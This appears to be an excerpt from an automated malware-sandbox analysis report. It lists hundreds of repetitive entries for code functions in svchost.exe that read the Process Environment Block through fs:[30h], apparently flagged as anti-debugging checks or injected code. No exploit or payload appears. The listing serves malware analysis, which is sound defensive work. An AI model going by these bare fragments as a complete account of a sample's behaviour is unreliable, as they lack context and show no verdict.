Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035BE7E1 mov eax, dword ptr fs:[00000030h] 1_2_035BE7E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D678E mov eax, dword ptr fs:[00000030h] 1_2_035D678E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035307AF mov eax, dword ptr fs:[00000030h] 1_2_035307AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E47A0 mov eax, dword ptr fs:[00000030h] 1_2_035E47A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354C640 mov eax, dword ptr fs:[00000030h] 1_2_0354C640
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03562674 mov eax, dword ptr fs:[00000030h] 1_2_03562674
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F866E mov eax, dword ptr fs:[00000030h] 1_2_035F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F866E mov eax, dword ptr fs:[00000030h] 1_2_035F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356A660 mov eax, dword ptr fs:[00000030h] 1_2_0356A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356A660 mov eax, dword ptr fs:[00000030h] 1_2_0356A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572619 mov eax, dword ptr fs:[00000030h] 1_2_03572619
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AE609 mov eax, dword ptr fs:[00000030h] 1_2_035AE609
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354260B mov eax, dword ptr fs:[00000030h] 1_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354260B mov eax, dword ptr fs:[00000030h] 1_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354260B mov eax, dword ptr fs:[00000030h] 1_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354260B mov eax, dword ptr fs:[00000030h] 1_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354260B mov eax, dword ptr fs:[00000030h] 1_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354260B mov eax, dword ptr fs:[00000030h] 1_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354260B mov eax, dword ptr fs:[00000030h] 1_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354E627 mov eax, dword ptr fs:[00000030h] 1_2_0354E627
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03566620 mov eax, dword ptr fs:[00000030h] 1_2_03566620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03568620 mov eax, dword ptr fs:[00000030h] 1_2_03568620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353262C mov eax, dword ptr fs:[00000030h] 1_2_0353262C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356A6C7 mov ebx, dword ptr fs:[00000030h] 1_2_0356A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356A6C7 mov eax, dword ptr fs:[00000030h] 1_2_0356A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AE6F2 mov eax, dword ptr fs:[00000030h] 1_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AE6F2 mov eax, dword ptr fs:[00000030h] 1_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AE6F2 mov eax, dword ptr fs:[00000030h] 1_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AE6F2 mov eax, dword ptr fs:[00000030h] 1_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B06F1 mov eax, dword ptr fs:[00000030h] 1_2_035B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B06F1 mov eax, dword ptr fs:[00000030h] 1_2_035B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03534690 mov eax, dword ptr fs:[00000030h] 1_2_03534690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03534690 mov eax, dword ptr fs:[00000030h] 1_2_03534690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035666B0 mov eax, dword ptr fs:[00000030h] 1_2_035666B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356C6A6 mov eax, dword ptr fs:[00000030h] 1_2_0356C6A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03538550 mov eax, dword ptr fs:[00000030h] 1_2_03538550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03538550 mov eax, dword ptr fs:[00000030h] 1_2_03538550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356656A mov eax, dword ptr fs:[00000030h] 1_2_0356656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356656A mov eax, dword ptr fs:[00000030h] 1_2_0356656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356656A mov eax, dword ptr fs:[00000030h] 1_2_0356656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C6500 mov eax, dword ptr fs:[00000030h] 1_2_035C6500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03604500 mov eax, dword ptr fs:[00000030h] 1_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03604500 mov eax, dword ptr fs:[00000030h] 1_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03604500 mov eax, dword ptr fs:[00000030h] 1_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03604500 mov eax, dword ptr fs:[00000030h] 1_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03604500 mov eax, dword ptr fs:[00000030h] 1_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03604500 mov eax, dword ptr fs:[00000030h] 1_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03604500 mov eax, dword ptr fs:[00000030h] 1_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540535 mov eax, dword ptr fs:[00000030h] 1_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540535 mov eax, dword ptr fs:[00000030h] 1_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540535 mov eax, dword ptr fs:[00000030h] 1_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540535 mov eax, dword ptr fs:[00000030h] 1_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540535 mov eax, dword ptr fs:[00000030h] 1_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540535 mov eax, dword ptr fs:[00000030h] 1_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h] 1_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h] 1_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h] 1_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h] 1_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h] 1_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035365D0 mov eax, dword ptr fs:[00000030h] 1_2_035365D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356A5D0 mov eax, dword ptr fs:[00000030h] 1_2_0356A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356A5D0 mov eax, dword ptr fs:[00000030h] 1_2_0356A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356E5CF mov eax, dword ptr fs:[00000030h] 1_2_0356E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356E5CF mov eax, dword ptr fs:[00000030h] 1_2_0356E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035325E0 mov eax, dword ptr fs:[00000030h] 1_2_035325E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356C5ED mov eax, dword ptr fs:[00000030h] 1_2_0356C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356C5ED mov eax, dword ptr fs:[00000030h] 1_2_0356C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356E59C mov eax, dword ptr fs:[00000030h] 1_2_0356E59C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03532582 mov eax, dword ptr fs:[00000030h] 1_2_03532582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03532582 mov ecx, dword ptr fs:[00000030h] 1_2_03532582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03564588 mov eax, dword ptr fs:[00000030h] 1_2_03564588
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035545B1 mov eax, dword ptr fs:[00000030h] 1_2_035545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035545B1 mov eax, dword ptr fs:[00000030h] 1_2_035545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B05A7 mov eax, dword ptr fs:[00000030h] 1_2_035B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B05A7 mov eax, dword ptr fs:[00000030h] 1_2_035B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B05A7 mov eax, dword ptr fs:[00000030h] 1_2_035B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035EA456 mov eax, dword ptr fs:[00000030h] 1_2_035EA456
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352645D mov eax, dword ptr fs:[00000030h] 1_2_0352645D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355245A mov eax, dword ptr fs:[00000030h] 1_2_0355245A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h] 1_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h] 1_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h] 1_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h] 1_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h] 1_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h] 1_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h] 1_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h] 1_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355A470 mov eax, dword ptr fs:[00000030h] 1_2_0355A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355A470 mov eax, dword ptr fs:[00000030h] 1_2_0355A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355A470 mov eax, dword ptr fs:[00000030h] 1_2_0355A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035BC460 mov ecx, dword ptr fs:[00000030h] 1_2_035BC460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03568402 mov eax, dword ptr fs:[00000030h] 1_2_03568402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03568402 mov eax, dword ptr fs:[00000030h] 1_2_03568402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03568402 mov eax, dword ptr fs:[00000030h] 1_2_03568402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356A430 mov eax, dword ptr fs:[00000030h] 1_2_0356A430
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352E420 mov eax, dword ptr fs:[00000030h] 1_2_0352E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352E420 mov eax, dword ptr fs:[00000030h] 1_2_0352E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352E420 mov eax, dword ptr fs:[00000030h] 1_2_0352E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352C427 mov eax, dword ptr fs:[00000030h] 1_2_0352C427
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h] 1_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h] 1_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h] 1_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h] 1_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h] 1_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h] 1_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h] 1_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035304E5 mov ecx, dword ptr fs:[00000030h] 1_2_035304E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035EA49A mov eax, dword ptr fs:[00000030h] 1_2_035EA49A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035644B0 mov ecx, dword ptr fs:[00000030h] 1_2_035644B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035BA4B0 mov eax, dword ptr fs:[00000030h] 1_2_035BA4B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035364AB mov eax, dword ptr fs:[00000030h] 1_2_035364AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03528B50 mov eax, dword ptr fs:[00000030h] 1_2_03528B50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DEB50 mov eax, dword ptr fs:[00000030h] 1_2_035DEB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E4B4B mov eax, dword ptr fs:[00000030h] 1_2_035E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E4B4B mov eax, dword ptr fs:[00000030h] 1_2_035E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C6B40 mov eax, dword ptr fs:[00000030h] 1_2_035C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C6B40 mov eax, dword ptr fs:[00000030h] 1_2_035C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035FAB40 mov eax, dword ptr fs:[00000030h] 1_2_035FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D8B42 mov eax, dword ptr fs:[00000030h] 1_2_035D8B42
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0352CB7E mov eax, dword ptr fs:[00000030h] 1_2_0352CB7E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03602B57 mov eax, dword ptr fs:[00000030h] 1_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03602B57 mov eax, dword ptr fs:[00000030h] 1_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03602B57 mov eax, dword ptr fs:[00000030h] 1_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03602B57 mov eax, dword ptr fs:[00000030h] 1_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h] 1_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h] 1_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h] 1_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h] 1_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h] 1_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h] 1_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h] 1_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h] 1_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h] 1_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03604B00 mov eax, dword ptr fs:[00000030h] 1_2_03604B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355EB20 mov eax, dword ptr fs:[00000030h] 1_2_0355EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355EB20 mov eax, dword ptr fs:[00000030h] 1_2_0355EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F8B28 mov eax, dword ptr fs:[00000030h] 1_2_035F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F8B28 mov eax, dword ptr fs:[00000030h] 1_2_035F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DEBD0 mov eax, dword ptr fs:[00000030h] 1_2_035DEBD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03550BCB mov eax, dword ptr fs:[00000030h] 1_2_03550BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03550BCB mov eax, dword ptr fs:[00000030h] 1_2_03550BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03550BCB mov eax, dword ptr fs:[00000030h] 1_2_03550BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03530BCD mov eax, dword ptr fs:[00000030h] 1_2_03530BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03530BCD mov eax, dword ptr fs:[00000030h] 1_2_03530BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03530BCD mov eax, dword ptr fs:[00000030h] 1_2_03530BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03538BF0 mov eax, dword ptr fs:[00000030h] 1_2_03538BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03538BF0 mov eax, dword ptr fs:[00000030h] 1_2_03538BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03538BF0 mov eax, dword ptr fs:[00000030h] 1_2_03538BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355EBFC mov eax, dword ptr fs:[00000030h] 1_2_0355EBFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035BCBF0 mov eax, dword ptr fs:[00000030h] 1_2_035BCBF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540BBE mov eax, dword ptr fs:[00000030h] 1_2_03540BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540BBE mov eax, dword ptr fs:[00000030h] 1_2_03540BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E4BB0 mov eax, dword ptr fs:[00000030h] 1_2_035E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E4BB0 mov eax, dword ptr fs:[00000030h] 1_2_035E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h] 1_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h] 1_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h] 1_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h] 1_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h] 1_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h] 1_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h] 1_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540A5B mov eax, dword ptr fs:[00000030h] 1_2_03540A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540A5B mov eax, dword ptr fs:[00000030h] 1_2_03540A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035ACA72 mov eax, dword ptr fs:[00000030h] 1_2_035ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035ACA72 mov eax, dword ptr fs:[00000030h] 1_2_035ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356CA6F mov eax, dword ptr fs:[00000030h] 1_2_0356CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356CA6F mov eax, dword ptr fs:[00000030h] 1_2_0356CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356CA6F mov eax, dword ptr fs:[00000030h] 1_2_0356CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DEA60 mov eax, dword ptr fs:[00000030h] 1_2_035DEA60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035BCA11 mov eax, dword ptr fs:[00000030h] 1_2_035BCA11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03554A35 mov eax, dword ptr fs:[00000030h] 1_2_03554A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03554A35 mov eax, dword ptr fs:[00000030h] 1_2_03554A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356CA38 mov eax, dword ptr fs:[00000030h] 1_2_0356CA38
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356CA24 mov eax, dword ptr fs:[00000030h] 1_2_0356CA24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355EA2E mov eax, dword ptr fs:[00000030h] 1_2_0355EA2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03530AD0 mov eax, dword ptr fs:[00000030h] 1_2_03530AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03564AD0 mov eax, dword ptr fs:[00000030h] 1_2_03564AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03564AD0 mov eax, dword ptr fs:[00000030h] 1_2_03564AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03586ACC mov eax, dword ptr fs:[00000030h] 1_2_03586ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03586ACC mov eax, dword ptr fs:[00000030h] 1_2_03586ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03586ACC mov eax, dword ptr fs:[00000030h] 1_2_03586ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356AAEE mov eax, dword ptr fs:[00000030h] 1_2_0356AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356AAEE mov eax, dword ptr fs:[00000030h] 1_2_0356AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03568A90 mov edx, dword ptr fs:[00000030h] 1_2_03568A90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h] 1_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h] 1_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h] 1_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h] 1_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h] 1_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h] 1_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h] 1_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h] 1_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h] 1_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03604A80 mov eax, dword ptr fs:[00000030h] 1_2_03604A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03538AA0 mov eax, dword ptr fs:[00000030h] 1_2_03538AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03538AA0 mov eax, dword ptr fs:[00000030h] 1_2_03538AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03586AA4 mov eax, dword ptr fs:[00000030h] 1_2_03586AA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B0946 mov eax, dword ptr fs:[00000030h] 1_2_035B0946
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03604940 mov eax, dword ptr fs:[00000030h] 1_2_03604940
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D4978 mov eax, dword ptr fs:[00000030h] 1_2_035D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D4978 mov eax, dword ptr fs:[00000030h] 1_2_035D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035BC97C mov eax, dword ptr fs:[00000030h] 1_2_035BC97C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03556962 mov eax, dword ptr fs:[00000030h] 1_2_03556962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03556962 mov eax, dword ptr fs:[00000030h] 1_2_03556962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03556962 mov eax, dword ptr fs:[00000030h] 1_2_03556962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0357096E mov eax, dword ptr fs:[00000030h] 1_2_0357096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0357096E mov edx, dword ptr fs:[00000030h] 1_2_0357096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0357096E mov eax, dword ptr fs:[00000030h] 1_2_0357096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035BC912 mov eax, dword ptr fs:[00000030h] 1_2_035BC912
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03528918 mov eax, dword ptr fs:[00000030h] 1_2_03528918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03528918 mov eax, dword ptr fs:[00000030h] 1_2_03528918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AE908 mov eax, dword ptr fs:[00000030h] 1_2_035AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035AE908 mov eax, dword ptr fs:[00000030h] 1_2_035AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B892A mov eax, dword ptr fs:[00000030h] 1_2_035B892A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C892B mov eax, dword ptr fs:[00000030h] 1_2_035C892B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0353A9D0
